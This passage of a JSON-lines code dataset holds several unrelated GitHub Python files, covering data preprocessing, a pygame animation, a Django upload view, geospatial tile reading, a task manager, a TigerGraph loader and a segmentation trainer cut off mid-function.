os.path.join(\n self._data_dir, f\"{self._split}.tfrecord\")\n raw_dataset = tf.data.TFRecordDataset([data_path])\n # get a unique id per record\n raw_dataset = raw_dataset.enumerate(start=0)\n output_path = os.path.join(\n self._data_dir, \"processed\", f\"{self._split}.tfr\")\n\n return (root\n | \"Create\" >> beam.Create(raw_dataset)\n | \"Convert\" >> beam.FlatMapTuple(self.convert_to_tf_examples)\n | \"Shuffle\" >> beam.Reshuffle()\n | \"Write\" >> beam.io.WriteToTFRecord(\n output_path,\n coder=beam.coders.ProtoCoder(tf.train.Example)))\n\n\ndef pipeline(root):\n _ = (root | \"ProcessTrain\" >> ProcessSplit(\"train\"))\n _ = (root | \"ProcessVal\" >> ProcessSplit(\"val\"))\n _ = (root | \"ProcessTest\" >> ProcessSplit(\"test\"))\n\n\ndef main(argv):\n with beam.Pipeline(\n options=beam.options.pipeline_options.PipelineOptions(argv[1:])) as root:\n pipeline(root)\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n flags.mark_flag_as_required(\"data_dir\")\n flags.mark_flag_as_required(\"image_dir\")\n app.run(main)\n","repo_name":"google-research/pix2struct","sub_path":"pix2struct/preprocessing/convert_refexp.py","file_name":"convert_refexp.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"31"} +{"seq_id":"75033388888","text":"import random\nimport sys\nimport pygame\n\nclass Particle:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.size = random.randint(5, 20)\n self.color = (200, 200, 200)\n\n def move(self):\n self.x += random.randint(-1, 1)\n self.y += random.randint(-1, 1)\n\n def draw(self, screen):\n pygame.draw.circle(screen, self.color, (self.x, self.y), self.size)\n\nclass CloudEffectApp:\n def __init__(self, screen):\n self.screen = screen\n self.BLACK = (0, 0, 0)\n self.particles = [Particle(screen.get_width() // 2, screen.get_height() // 2) for _ in range(200)]\n self.clock = pygame.time.Clock()\n self.counter = 1600\n self.running = True\n\n def run(self):\n while self.running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n\n self.screen.fill(self.BLACK)\n\n for particle in self.particles:\n particle.move()\n particle.draw(self.screen)\n\n pygame.display.flip()\n\n if self.counter <= 0:\n self.running = False\n self.counter -= 1\n \n self.clock.tick(170)\n","repo_name":"kdrzazga/python-tutorial","sub_path":"games-anims/demo1/src/cloud_fog.py","file_name":"cloud_fog.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27919045306","text":"from django.shortcuts import render\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import *\nimport sys\nimport json\nsys.path.append('/home/lettf/handwriting_line_generation')\nfrom generate import main as gn\n# Create your views here.\ndef home(request):\n return render(request, \"home.html\")\n# /home/lettf/handwriting_line_generation/pretrained_weights/IAM_weights/IAMslant_noMask_charSpecSingleAppend_GANMedMT_autoAEMoPrcp2tightNewCTCUseGen_balB_hCF0.75_sMG/checkpoint-iteration175000.pth\n# /home/lettf/lettf/lettf/static/img\n# None\n# None\n# None \n# None\n# image_count=2,path0=./outputs/3.png,path1=./outputs/4.png,path2=./outputs/1.png,text_gen=\"This is Cat\"\n# None\n@csrf_exempt\ndef upload(request):\n fileList = request.FILES.getlist('files')\n txt = request.POST['txt']\n # obj = json.loads(request.body)\n # txt = obj['txt']\n print(txt)\n print(111)\n file_url = list()\n for item in fileList:\n # print(item)\n image = Image()\n image.img = item\n # img = cv2.imread(item,0)\n # print(item)\n # project_file.save()\n image.save()\n file_url.append(\"/home/lettf/lettf/lettf\"+str(image))\n print(file_url)\n file_len = len(fileList)\n # print(file_len)\n arg = \"image_count=\"+str(file_len)\n for f in range(len(file_url)):\n arg += \",path\"+str(f)+\"=\"+file_url[f]\n arg+=\",text_gen='\"+txt+\"'\"\n s = arg.split(',')\n # print(arg)\n arguments={}\n for pair in s:\n ss = pair.split('=')\n arguments[ss[0]]=ss[1]\n print(arguments)\n text_gen = arguments[\"text_gen\"]\n print(f\"text_gen : { text_gen }\")\n img_txt = gn(\"/home/lettf/handwriting_line_generation/pretrained_weights/IAM_weights/IAMslant_noMask_charSpecSingleAppend_GANMedMT_autoAEMoPrcp2tightNewCTCUseGen_balB_hCF0.75_sMG/checkpoint-iteration175000.pth\",\n \"/home/lettf/lettf/lettf/home/static/img\",\n arguments=arguments, \n )\n # ttf 만들기 \n arg = \"image_count=2\"\n for f in range(2):\n arg += \",path\"+str(f)+\"=\"+file_url[f]\n s = arg.split(',')\n arguments={}\n for pair in s:\n ss = pair.split('=')\n arguments[ss[0]]=ss[1]\n alphabets = [f\"{chr(c)} \"+\" \".join([chr(c_) for c_ in (\n list(range(97, 123)) + list(range(65, 91)))]) for c in (\n list(range(97, 123)) + list(range(65, 91)))]\n arguments[\"text_gen\"] = alphabets\n ttf_txt = gn(\"/home/lettf/handwriting_line_generation/pretrained_weights/IAM_weights/IAMslant_noMask_charSpecSingleAppend_GANMedMT_autoAEMoPrcp2tightNewCTCUseGen_balB_hCF0.75_sMG/checkpoint-iteration175000.pth\",\n \"/home/lettf/lettf/lettf/home/static/img\",\n arguments=arguments,\n alphabets=True \n )\n essence = {\n 'img_txt':img_txt,\n 'ttf_txt':ttf_txt\n }\n return JsonResponse(essence)","repo_name":"Minhee331/Lettf","sub_path":"lettf/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34221683109","text":"'''\n\nGiven a target, we have to answer True or False depending whether it is included or not\n\n'''\n\n#from collections import deque\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef tree_includes(root, target):\n '''\n Use dfs recursively to find the target\n\n '''\n if root == None:\n return False\n elif root.val == target:\n return True\n\n return tree_includes(root.left, target) | tree_includes(root.right, target)\n\n\na = Node(\"a\")\nb = Node(\"b\")\nc = Node(\"c\")\nd = Node(\"d\")\ne = Node(\"e\")\nf = Node(\"f\")\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\n# a\n# / \\\n# b c\n# / \\ \\\n# d e f\n\nprint(tree_includes(a, \"e\"))\n","repo_name":"Zarasim/Python_projects","sub_path":"Binary_tree/tree_includes.py","file_name":"tree_includes.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29936477969","text":"# type:ignore\n# flake8:noqa\n\"\"\"Overrides to COG reading by titiler/rio_tiler.\n\nThis file contains workarounds in the form of\noverridden logic in order to make titiler/rio_tiler\nwork in certain cases.\nSpecifically, the GOES thumbnails would not render correctly\ndue to the WarpedVRT not being able to handle errors coming from\nthe custom CRS of those COGs.\n\"\"\"\nimport math\nimport warnings\nfrom typing import Any, Callable, Dict, Optional, Tuple, Union\n\nimport numpy\nfrom rasterio import windows\nfrom rasterio.enums import Resampling\nfrom rasterio.io import DatasetReader, DatasetWriter\nfrom rasterio.vrt import WarpedVRT\nfrom rio_tiler.constants import Indexes, NoData\nfrom rio_tiler.errors import AlphaBandWarning, ExpressionMixingWarning\nfrom rio_tiler.expression import apply_expression, parse_expression\nfrom rio_tiler.io.stac import COGReader\nfrom rio_tiler.models import ImageData\nfrom rio_tiler.utils import non_alpha_indexes\n\n\ndef goes_thumbnail_read(\n src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],\n height: Optional[int] = None,\n width: Optional[int] = None,\n indexes: Optional[Indexes] = None,\n window: Optional[windows.Window] = None,\n force_binary_mask: bool = True,\n nodata: Optional[NoData] = None,\n unscale: bool = False,\n resampling_method: Resampling = Resampling.nearest,\n vrt_options: Optional[Dict] = None,\n post_process: Optional[\n Callable[[numpy.ndarray, numpy.ndarray], Tuple[numpy.ndarray, numpy.ndarray]]\n ] = None,\n) -> Tuple[numpy.ndarray, numpy.ndarray]:\n \"\"\"Low level read function.\n\n Args:\n src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.\n height (int, optional): Output height of the array.\n width (int, optional): Output width of the array.\n indexes (sequence of int or int, optional): Band indexes.\n window (rasterio.windows.Window, optional): Window to read.\n force_binary_mask (bool, optional): Cast returned mask to binary values (0 or 255). Defaults to `True`.\n nodata (int or float, optional): Overwrite dataset internal nodata value.\n unscale (bool, optional): Apply 'scales' and 'offsets' on output data value. Defaults to `False`.\n resampling_method (rasterio.enums.Resampling, optional): Rasterio's resampling algorithm. Defaults to `nearest`.\n vrt_options (dict, optional): Options to be passed to the rasterio.warp.WarpedVRT class.\n post_process (callable, optional): Function to apply on output data and mask values.\n\n Returns:\n tuple: Data (numpy.ndarray) and Mask (numpy.ndarray) values.\n\n \"\"\"\n # OVERRIDE: Set indexes manually so they don't get checked\n # if isinstance(indexes, int):\n # indexes = (indexes,)\n indexes = (1,)\n\n vrt_params = dict(add_alpha=True, resampling=Resampling[resampling_method])\n nodata = nodata if nodata is not None else src_dst.nodata\n if nodata is not None:\n vrt_params.update(dict(nodata=nodata, add_alpha=False, src_nodata=nodata))\n\n # OVERRIDE: Getting the alpha band raises an error on GOES\n # if has_alpha_band(src_dst):\n # vrt_params.update(dict(add_alpha=False))\n\n if indexes is None:\n indexes = non_alpha_indexes(src_dst)\n print(indexes)\n if indexes != src_dst.indexes:\n warnings.warn(\n \"Alpha band was removed from the output data array\", AlphaBandWarning\n )\n\n out_shape = (len(indexes), height, width) if height and width else None\n mask_out_shape = (height, width) if height and width else None\n resampling = Resampling[resampling_method]\n\n if vrt_options:\n vrt_params.update(vrt_options)\n\n # OVERRIDE - don't use a WarpedVRT or else it fails with GOES.\n data = src_dst.read(\n indexes=indexes,\n window=window,\n out_shape=out_shape,\n resampling=resampling,\n )\n mask = src_dst.dataset_mask(\n window=window,\n out_shape=mask_out_shape,\n resampling=resampling,\n )\n\n if force_binary_mask:\n mask = numpy.where(mask != 0, numpy.uint8(255), numpy.uint8(0))\n\n if unscale:\n data = data.astype(\"float32\", casting=\"unsafe\")\n numpy.multiply(data, src_dst.scales[0], out=data, casting=\"unsafe\")\n numpy.add(data, src_dst.offsets[0], out=data, casting=\"unsafe\")\n\n if post_process:\n data, mask = post_process(data, mask)\n\n return data, mask\n\n\ndef goes_thumbnail_preview(\n src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],\n max_size: int = 1024,\n height: int = None,\n width: int = None,\n **kwargs: Any,\n) -> Tuple[numpy.ndarray, numpy.ndarray]:\n \"\"\"Read decimated version of a dataset.\n\n Args:\n src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.\n max_size (int, optional): Limit output size array if not widht and height. Defaults to `1024`.\n height (int, optional): Output height of the array.\n width (int, optional): Output width of the array.\n kwargs (optional): Additional options to forward to `rio_tiler.reader.read`.\n\n Returns:\n tuple: Data (numpy.ndarray) and Mask (numpy.ndarray) values.\n\n \"\"\"\n if not height and not width:\n if max(src_dst.height, src_dst.width) < max_size:\n height, width = src_dst.height, src_dst.width\n else:\n ratio = src_dst.height / src_dst.width\n if ratio > 1:\n height = max_size\n width = math.ceil(height / ratio)\n else:\n width = max_size\n height = math.ceil(width * ratio)\n\n return goes_thumbnail_read(src_dst, height, width, **kwargs)\n\n\nclass CustomCOGReader(COGReader):\n \"\"\"Custom COG reader to work around an issue with GOES projection.\n\n A hack to get GOES thumbnails to appear, which fail with a \"tolerance error\"\n when using the default logic. For the GOES case this doesn't use a WarpedVRT,\n which avoids that error.\n \"\"\"\n\n def preview_goes(\n self,\n indexes: Optional[Indexes] = None,\n expression: Optional[str] = None,\n **kwargs: Any,\n ) -> ImageData:\n \"\"\"Return a preview of a COG. (Custom hack for GOES)\n\n Args:\n indexes (sequence of int or int, optional): Band indexes.\n expression (str, optional): rio-tiler expression (e.g. b1/b2+b3).\n kwargs (optional): Options to forward to the `rio_tiler.reader.preview` function.\n\n Returns:\n rio_tiler.models.ImageData: ImageData instance with data, mask and input spatial info.\n\n \"\"\"\n kwargs = {**self._kwargs, **kwargs}\n\n if isinstance(indexes, int):\n indexes = (indexes,)\n\n if indexes and expression:\n warnings.warn(\n \"Both expression and indexes passed; expression will overwrite indexes parameter.\",\n ExpressionMixingWarning,\n )\n\n if expression:\n indexes = parse_expression(expression)\n\n data, mask = goes_thumbnail_preview(self.dataset, indexes=indexes, **kwargs)\n\n if expression and indexes:\n blocks = expression.lower().split(\",\")\n bands = [f\"b{bidx}\" for bidx in indexes]\n data = apply_expression(blocks, bands, data)\n\n return ImageData(\n data,\n mask,\n bounds=self.dataset.bounds,\n crs=self.dataset.crs,\n assets=[self.filepath],\n )\n\n def preview(\n self,\n indexes: Optional[Indexes] = None,\n expression: Optional[str] = None,\n **kwargs: Any,\n ) -> ImageData:\n \"\"\"Return a preview of a COG.\n\n Args:\n indexes (sequence of int or int, optional): Band indexes.\n expression (str, optional): rio-tiler expression (e.g. b1/b2+b3).\n kwargs (optional): Options to forward to the `rio_tiler.reader.preview` function.\n\n Returns:\n rio_tiler.models.ImageData: ImageData instance with data, mask and input spatial info.\n\n \"\"\"\n if \"goeseuwest.blob.core.windows.net\" in self.filepath:\n return self.preview_goes(indexes, expression, **kwargs)\n\n return super().preview(indexes, expression, **kwargs)\n","repo_name":"hobu/planetary-computer-apis","sub_path":"pctiler/pctiler/reader_cog.py","file_name":"reader_cog.py","file_ext":"py","file_size_in_byte":8320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"34745178543","text":"from objects.drone import Drone\nfrom objects.waypoint import Waypoint\nfrom objects.mission import Mission\n\ndef is_augmentable(M: Mission, p: Waypoint, drone: Drone, depo: Waypoint) -> bool:\n if M is None or p is None:\n return False\n\n total_energy = p.flying_cost + p.hovering_cost + M.flying_cost + M.hovering_cost\n if len(M.flying_path) > 0:\n total_energy += M.distance_to_depo(depo, p)\n\n\n if total_energy > drone.energy:\n print(total_energy, \"False\")\n return False\n\n if p.data_size + M.data_size > drone.storage:\n print(total_energy, \"False\")\n return False\n\n print(total_energy, \"True\")\n return True\n","repo_name":"kamka427/RSEO-vis","sub_path":"algorithms/is_augmentable.py","file_name":"is_augmentable.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1372301401","text":"from validate import *\r\n\r\nimport csv\r\n\r\n\r\ndef print_main_menu(menu):\r\n \"\"\"\r\n Given a dictionary `menu`,\r\n prints the keys and values as the\r\n formatted options of a menu.\r\n Adds additional prints for decoration\r\n and to output a question\r\n \"What would you like to do?\"\r\n \"\"\"\r\n print(\"**************************\")\r\n print('What would you like to do?')\r\n for key, value in menu.items():\r\n print(key, '-', value)\r\n print(\"**************************\")\r\ndef check_option(opt, menu):\r\n \"\"\"\r\n Given an option, return \"valid\" if it is\r\n of type str and is a valid key in\r\n the provided `menu` collection.\r\n Otherwise, return \"invalid\".\r\n \"\"\"\r\n if type(opt) == str and opt in menu:\r\n return \"valid\"\r\n return \"invalid\"\r\n\r\ndef create_a_task(name, description, date, priority, completed):\r\n '''\r\n validate each parameter starting from \"name\" and until \"completed\"\r\n If one of them fails, return (False, )\r\n ex. (False, \"name\") if \"name\" is not 3-15 characters long\r\n or (False, \"completed\") if completed is not a \"yes\" or \"no\"\r\n If all validations pass, return (True, )\r\n '''\r\n if validate_name(name) != True:\r\n return (False, 'name')\r\n elif validate_description(description) != True:\r\n return (False, 'description')\r\n elif validate_date(date) != True:\r\n return (False, 'deadline')\r\n elif validate_priority(priority) != True:\r\n return (False, 'priority')\r\n elif validate_completed(completed) != True:\r\n return (False, 'completed')\r\n else:\r\n if completed == 'yes' or completed == 'Yes' or completed == 'True':\r\n completed = True\r\n else:\r\n completed = False\r\n get = {\r\n 'name': name,\r\n 'description': description,\r\n 'deadline': date,\r\n 'priority': int(priority),\r\n 'completed': completed\r\n \r\n }\r\n \r\n return (True,get)\r\n \r\n\r\ndef slashes_to_written(date_list):\r\n \"\"\"\r\n Change list of dates in to the date form that\r\n we want\r\n \"\"\"\r\n month_names = {\r\n 1: \"January\",\r\n 2: \"February\",\r\n 3: \"March\",\r\n 4: \"April\",\r\n 5: \"May\",\r\n 6: \"June\",\r\n 7: \"July\",\r\n 8: \"August\",\r\n 9: \"September\",\r\n 10: \"October\",\r\n 11: \"November\",\r\n 12: \"December\",\r\n }\r\n # Finish the function\r\n month = month_names[int(date_list[0])]\r\n day = str(int(date_list[1]))\r\n result = f'{month} {day}, {date_list[2]}'\r\n return result\r\n\r\ndef formatted_completed(completed):\r\n \"\"\"\r\n change the completed status from boolean to Yes or No\r\n \"\"\"\r\n if completed==True:\r\n return 'Yes'\r\n else:\r\n return 'No'\r\n\r\ndef boolean_completed(completed):\r\n \"\"\"\r\n change the completed status from Yes or No to Boolean\r\n \"\"\"\r\n if completed=='yes' or completed=='Yes' or completed=='True' or completed==True:\r\n return True\r\n else:\r\n return False\r\n\r\ndef formatted_priority(priority):\r\n \"\"\"\r\n Change the priority into status(str)\r\n \"\"\"\r\n if priority==1:\r\n return 'Lowest'\r\n elif priority==2:\r\n return 'Low'\r\n elif priority==3:\r\n return 'Medium'\r\n elif priority==4:\r\n return 'High'\r\n else:\r\n return 'Highest'\r\n\r\n\r\ndef print_formatted_tasks(tasks_list):\r\n \"\"\"\r\n print_formatted_tasks, each attributes on by one\r\n \"\"\"\r\n index = 0\r\n for i in tasks_list:\r\n print(f\"{index}: {i['name'].upper()}\")\r\n print(f\" Description: {i['description']}\")\r\n print(f\" Priority: {formatted_priority(i['priority'])}\")\r\n print(f\" Deadline: {slashes_to_written(i['deadline'].split('/'))}\")\r\n print(f\" Completed: {formatted_completed(i['completed'])}\")\r\n index += 1\r\n print()\r\ndef print_tasks_by_status(all_tasks, completed=False):\r\n \"\"\" Prints tasks from 'all_tasks', based on the value of 'completed' of each task. \r\n If there are no tasks that are incomplete, prints 'You do not have incomplete tasks.'\r\n If there are no tasks that are completed, prints 'You do not have completed tasks.' \r\n Otherwise, prints the requested tasks. \"\"\"\r\n c=0\r\n inc=0\r\n tasks_listT=[]\r\n tasks_listF=[]\r\n if len(all_tasks)==0:\r\n return None\r\n for i in all_tasks:\r\n if i['completed'] in ['Yes','yes']:\r\n c+=1\r\n tasks_listT.append(i)\r\n elif i['completed'] in ['No','no']:\r\n inc+=1\r\n tasks_listF.append(i)\r\n if completed==False and c==len(all_tasks):\r\n print('You do not have incomplete tasks.')\r\n elif completed==True and inc==len(all_tasks):\r\n print('You do not have completed tasks.')\r\n else:\r\n if completed==False:\r\n print_formatted_tasks(tasks_listF)\r\n else:\r\n print_formatted_tasks(tasks_listT)\r\n \r\n\r\ndef update_task(task_list,task_id,task_field,task_update):\r\n \"\"\" \r\n Update one of the task in the task lists depending on the task field\r\n if the inputs are valid, we update the content of the task\r\n \"\"\"\r\n fields=[\r\n 'name',\r\n 'description',\r\n 'deadline',\r\n 'priority',\r\n 'completed'\r\n ]\r\n if not (is_numeric(task_id) and is_valid_index(task_id, task_list)):\r\n return (False,'idx')\r\n \r\n if check_option(task_field, fields)=='invalid':\r\n return (False,'field')\r\n \r\n if task_field=='name':\r\n if validate_name(task_update):\r\n task_list[task_id]['name']=task_update\r\n return (True,task_list[task_id])\r\n else:\r\n return (False,'name')\r\n elif task_field=='description':\r\n if validate_description(task_update):\r\n task_list[task_id]['description']=task_update\r\n return (True,task_list[task_id])\r\n else:\r\n return (False,'description')\r\n elif task_field=='deadline':\r\n if validate_date(task_update):\r\n task_list[task_id]['deadline']=task_update\r\n return (True,task_list[task_id])\r\n else:\r\n return (False,'deadline') \r\n elif task_field=='priority':\r\n if validate_priority(task_update):\r\n task_list[task_id]['priority']=task_update\r\n return (True,task_list[task_id])\r\n else:\r\n return (False,'priority') \r\n elif task_field=='completed':\r\n if validate_completed(task_update):\r\n task_list[task_id]['completed']=boolean_completed(task_update)\r\n return (True,task_list[task_id])\r\n else:\r\n return (False,'completed') \r\n\r\ndef print_sorted_priority(all_tasks):\r\n \"\"\" \r\n Print all tasks based on the priority\r\n Highest priority will be first\r\n \"\"\"\r\n newlist = sorted(all_tasks, key=lambda d: d['priority'],reverse=True)\r\n print_formatted_tasks(newlist)\r\n\r\ndef compare_time(date):\r\n \"\"\" \r\n Change the data into number and can be compared with each other\r\n e.g: '02/02/2021' to 20210202\r\n so that we can use it in print_sorted_deadline\r\n \"\"\"\r\n date=date.split('/')\r\n num_date=int(date[2]+date[1]+date[0])\r\n return num_date\r\n\r\n\r\ndef print_sorted_deadline(all_tasks):\r\n \"\"\" \r\n Print all tasks based on the deadline\r\n Closest deadline will be first\r\n \"\"\"\r\n newlist = sorted(all_tasks, key=lambda d: compare_time(d['deadline']))\r\n print_formatted_tasks(newlist)\r\n\r\ndef delete_task(idx,tasks):\r\n \"\"\" \r\n delete a task based on the index\r\n \"\"\"\r\n if is_valid_index(idx,tasks):\r\n tasks.pop(idx)\r\n return True\r\n else:\r\n return False\r\n\r\ndef save_to_csv(my_list,filename):\r\n \"\"\" \r\n save the list into csv file following the rule \r\n \"\"\"\r\n with open(filename,'w',newline='') as myfile:\r\n task_writer=csv.writer(myfile)\r\n for i in my_list:\r\n task_data=list(i.values())\r\n task_writer.writerow(task_data)\r\n\r\n\r\ndef load_from_csv(filename):\r\n \"\"\" \r\n read the csv file and transform it into list following our rule\r\n \"\"\"\r\n my_list=[]\r\n with open(filename,'r',newline='') as myfile:\r\n reader_object=csv.reader(myfile)\r\n for values in reader_object:\r\n if len(values)==5:\r\n if values[4]=='True':\r\n values[4]='yes'\r\n else:\r\n values[4]='no'\r\n result=create_a_task(values[0],values[1],values[2],values[3],values[4])\r\n if result[0]:\r\n my_list.append(result[1])\r\n else:\r\n return \"invalid data\"\r\n else:\r\n return \"inconsistent format\"\r\n return my_list\r\n","repo_name":"ZengHaijiang/Project-Management-System","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37298456692","text":"import pyTigerGraph as tg # Importing\nimport pandas as pd\nimport json\n\n\n#for i in countries:\n # print(str(i)+\" food shortage\")\n\n\n# Create a Connection\nconn = tg.TigerGraphConnection(host=\"https://foodtwit.i.tgcloud.io\", username=\"tigergraph\",\n password=\"tigergraph\")\n\nprint(conn.gsql('ls', options=[]))\n\nconn.graphname = \"FOODNEWS3\"\nsecret = conn.createSecret()\nauthToken = conn.getToken(secret)\nauthToken = authToken[0]\nprint(authToken)\n\nconn.graphname = \"FOODNEWS3\"\nsecret = conn.createSecret()\nauthToken = conn.getToken(secret)\nauthToken = authToken[0]\nprint(authToken)\n\narticles_file = 'articles.csv'\nresults = conn.uploadFile(articles_file, fileTag='MyDataSource', jobName='load_articles')\nprint(json.dumps(results, indent=2))\n\ntopics_file = 'topics.csv'\nresults=conn.uploadFile(topics_file, fileTag='MyDataSource', jobName='load_topics')\nprint(json.dumps(results, indent=2))\n\ns_file= 'sentiment.csv'\nresults=conn.uploadFile(s_file, fileTag='MyDataSource', jobName='load_sentiment')\nprint(json.dumps(results, indent=2))\n\nl_file = 'labels.csv'\nresults=conn.uploadFile(l_file, fileTag='MyDataSource', jobName='load_labels')\nprint(json.dumps(results, indent=2))\n","repo_name":"rapha18th/foodtwit","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1024054085","text":"import logging\nfrom pathlib import Path\nimport json\nimport pandas as pd\nimport tifffile\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\nimport torch\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\nimport torch.optim as optim\nimport torch.optim.swa_utils as swa_utils\n\nimport settings\nimport annotation_utils\nimport visualization\nimport transforms\nimport torch_datasets\nimport torch_modules\nimport torch_utils\nimport metrics\nimport evaluation\nimport test_time_augmentations\n\n\nclass SemanticSegmentationTrainer:\n\n def __init__(self, dataset_parameters, model_parameters, training_parameters, transform_parameters, inference_parameters, persistence_parameters):\n\n self.dataset_parameters = dataset_parameters\n self.model_parameters = model_parameters\n self.training_parameters = training_parameters\n self.transform_parameters = transform_parameters\n self.inference_parameters = inference_parameters\n self.persistence_parameters = persistence_parameters\n\n def train(self, train_loader, model, criterion, optimizer, device, scheduler=None):\n\n \"\"\"\n Train given model on given data loader\n\n Parameters\n ----------\n train_loader (torch.utils.data.DataLoader): Training set data loader\n model (torch.nn.Module): Model to train\n criterion (torch.nn.Module): Loss function\n optimizer (torch.optim.Optimizer): Optimizer\n device (torch.device): Location of the model and inputs\n scheduler (torch.optim.LRScheduler or None): Learning rate scheduler\n\n Returns\n -------\n train_loss (float): Average training loss after model is fully trained on training set data loader\n \"\"\"\n\n model.train()\n progress_bar = tqdm(train_loader)\n losses = []\n\n for inputs, targets in progress_bar:\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n if scheduler is not None:\n scheduler.step()\n losses.append(loss.detach().item())\n average_loss = np.mean(losses)\n lr = scheduler.get_last_lr()[0] if scheduler is not None else optimizer.param_groups[0]['lr']\n progress_bar.set_description(f'train_loss: {average_loss:.6f} - lr: {lr:.8f}')\n\n train_loss = np.mean(losses)\n return train_loss\n\n def validate(self, val_loader, model, criterion, device):\n\n \"\"\"\n Validate given model on given data loader\n\n Parameters\n ----------\n val_loader (torch.utils.data.DataLoader): Validation set data loader\n model (torch.nn.Module): Model to validate\n criterion (torch.nn.Module): Loss function\n device (torch.device): Location of the model and inputs\n\n Returns\n -------\n val_loss (float): Average validation loss after model is fully validated on validation set data loader\n val_dice_coefficients (tuple and float): Validation dice coefficients after model is fully validated on validation set data loader\n val_intersection_over_unions (tuple and float): Validation intersection over unions after model is fully validated on validation set data loader\n \"\"\"\n\n model.eval()\n progress_bar = tqdm(val_loader)\n losses = []\n ground_truth = []\n predictions = []\n\n with torch.no_grad():\n for inputs, targets in progress_bar:\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n losses.append(loss.detach().item())\n average_loss = np.mean(losses)\n progress_bar.set_description(f'val_loss: {average_loss:.6f}')\n ground_truth += [(targets.detach().cpu())]\n predictions += [(outputs.detach().cpu())]\n\n val_loss = np.mean(losses)\n ground_truth = torch.squeeze(torch.cat(ground_truth, dim=0), dim=1)\n predictions = torch.sigmoid(torch.squeeze(torch.cat(predictions, dim=0), dim=1))\n val_dice_coefficients = metrics.mean_binary_dice_coefficient(ground_truth=ground_truth, predictions=predictions, thresholds=self.inference_parameters['label_threshold_range'])\n val_intersection_over_unions = metrics.mean_binary_intersection_over_union(ground_truth=ground_truth, predictions=predictions, thresholds=self.inference_parameters['label_threshold_range'])\n\n return val_loss, val_dice_coefficients, val_intersection_over_unions\n\n def train_and_validate(self, df_train, df_test):\n\n \"\"\"\n Train and validate on inputs and targets listed on given dataframes with specified configuration and transforms\n\n Parameters\n ----------\n df_train (pandas.DataFrame of shape (n_rows, n_columns)): Dataframe of filenames, targets and folds\n df_test (pandas.DataFrame of shape (n_rows, n_columns)): Dataframe of filenames\n \"\"\"\n\n logging.info(f'\\n{\"-\" * 30}\\nRunning {self.persistence_parameters[\"name\"]} Model for Training - Seed: {self.training_parameters[\"random_state\"]}\\n{\"-\" * 30}\\n')\n\n # Create directory for models and visualizations\n model_root_directory = Path(settings.MODELS / self.persistence_parameters['name'])\n model_root_directory.mkdir(parents=True, exist_ok=True)\n\n dataset_transforms = transforms.get_semantic_segmentation_transforms(**self.transform_parameters)\n scores = []\n\n for fold in self.training_parameters['folds']:\n\n train_idx, val_idx = df_train.loc[df_train[fold] == 0].index, df_train.loc[df_train[fold] == 1].index\n # Validate on training set if validation is set is not specified\n if len(val_idx) == 0:\n val_idx = train_idx\n\n logging.info(f'\\n{fold} - Training: {len(train_idx)} ({len(train_idx) // self.training_parameters[\"training_batch_size\"] + 1} steps) - Validation {len(val_idx)} ({len(val_idx) // self.training_parameters[\"test_batch_size\"] + 1} steps)')\n train_dataset = torch_datasets.SemanticSegmentationDataset(\n image_paths=df_train.loc[train_idx, self.dataset_parameters['inputs']].values,\n organs=df_train.loc[train_idx, 'organ'].values,\n data_sources=df_train.loc[train_idx, 'data_source'].values,\n masks=df_train.loc[train_idx, 'rle'].values,\n transforms=dataset_transforms['train'],\n imaging_measurement_adaptation_probability=self.transform_parameters['imaging_measurement_adaptation_probability'],\n standardize_luminosity_probability=self.transform_parameters['standardize_luminosity_probability']\n )\n train_loader = DataLoader(\n train_dataset,\n batch_size=self.training_parameters['training_batch_size'],\n sampler=RandomSampler(train_dataset),\n pin_memory=False,\n drop_last=False,\n num_workers=self.training_parameters['num_workers']\n )\n val_dataset = torch_datasets.SemanticSegmentationDataset(\n image_paths=df_train.loc[val_idx, self.dataset_parameters['inputs']].values,\n organs=df_train.loc[val_idx, 'organ'].values,\n data_sources=df_train.loc[val_idx, 'data_source'].values,\n masks=df_train.loc[val_idx, 'rle'].values,\n transforms=dataset_transforms['val'],\n imaging_measurement_adaptation_probability=0,\n standardize_luminosity_probability=0\n )\n val_loader = DataLoader(\n val_dataset,\n batch_size=self.training_parameters['test_batch_size'],\n sampler=SequentialSampler(val_dataset),\n pin_memory=False,\n drop_last=False,\n num_workers=self.training_parameters['num_workers']\n )\n\n # Set model, loss function, device and seed for reproducible results\n 